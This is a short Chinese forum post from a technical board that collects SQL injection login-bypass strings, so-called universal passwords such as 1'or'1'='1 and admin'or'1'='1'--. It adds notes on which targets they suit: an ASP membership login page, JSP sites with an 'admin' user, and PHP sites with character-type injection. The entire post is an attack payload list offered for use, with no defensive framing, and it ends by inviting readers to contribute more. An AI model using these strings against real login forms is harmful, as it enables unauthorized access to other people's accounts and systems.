D0000D发往论坛板块-------------------------------------------------------
No2  号板块  技术文章
D8888D贴子标题-------------------------------------------------------
'or'='or'的总结贴
D8888D主贴内容-------------------------------------------------------
 

各种利用形式如下：
'or'='or'
1'or'1'='1 
admin'or'1'='1'-- 
'or’’=' 
" or "a"="a 
') or (’a’='a 
or 1=1-- ' 
or ’a’='a 
'or''=' 
'or'1'='1 
"or=or"
'or''=''or''='
'or'='1'
'or' '1'='1

特殊说明：
1.admin ' or '  membership/login.asp（国外某程序）

2.admin 1'or'1'='1 用于jsp程序，如果管理员有admin这个用户，有一定成功率。

3.存在字符型注入的php网站是可以用万能密码' or 1=1/*的（某文章提到过）

欢迎各位补充以及提出意见
